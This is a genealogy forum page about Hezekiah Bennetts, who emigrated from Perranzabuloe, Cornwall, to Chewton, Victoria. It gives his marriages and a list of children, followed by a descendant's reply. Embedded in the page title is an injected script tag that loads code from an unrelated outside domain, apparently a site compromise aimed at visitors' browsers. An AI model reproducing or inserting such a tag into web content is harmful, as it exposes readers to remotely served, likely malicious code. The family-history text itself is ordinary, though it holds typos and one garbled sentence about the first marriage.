Hezekiah Bennetts from Perron, Cornwall to Australia first to Chewton and then to Clifton Hill, Victoria, Australia<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script> :: FamilyTreeCircles.com Genealogy
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Hezekiah Bennetts from Perron, Cornwall to Australia first to Chewton and then to Clifton Hill, Victoria, Australia

Journal by kerbent

Hezekiah Bennetts who was born c 1818 in Perron, Cornwall, England, son of Philip and Nancy Bennetts.

His first wife, Mary Nance1805 - died on 15 Aug 1878 in Chewton, where she is also burried. They were in 1839, Perranzabube, Cornwall, England.

He married his second wife almost 6 months later, Mary Bullus born c1808 - died 22 Mar 1895. Mary Bullus also died in Chewton and was also burried in the Chewton cemetery, she was 10 years Hezekiah's senior.

Hezekiah Children from his first marriage
1. Mary Bennetts (Cal 1840- )
2. Unknown Bennetts ( - )
3. Mary Jane Bennetts (Est 1842-Bef 1878)
4. Nancy Bennetts(Est 1842-Bef 1900)
5. Rebecka Bennetts (Est 1849-1912) who married Joshua Jackaon 3 Jul 1869 Chewton, Victoria, Australia
6. Mary Anne Bennetts (Est 1852-Bef 1878)

I would be interested in hearing from anyone who has a connection with this family, Hezekiah Bennetts IS my 3xgreat grandfather.


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on 2007-12-11 22:52:47

kerbent , from Victoria, Australia, has been a Family Tree Circles member since Oct 2007. is researching the following names: EBBOTT, TODMAN, CRUMP and 14 other(s).

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by davelang on 2022-02-06 00:39:46

Hi, I know I've very late to the party but just came across your post when researching my own heritage. Hezekiah is also my 3x great grandfather, his daughter Rebecca & Joshua had a daugher Edith, who married Percy Dodds. They then had a bunch of kids, one of which was Aubrey Dodds. Aubrey married Thelma and had a daughter Margaret, who's my mum.

Anyway thought I'd reach out in case you're still looking for any more info!


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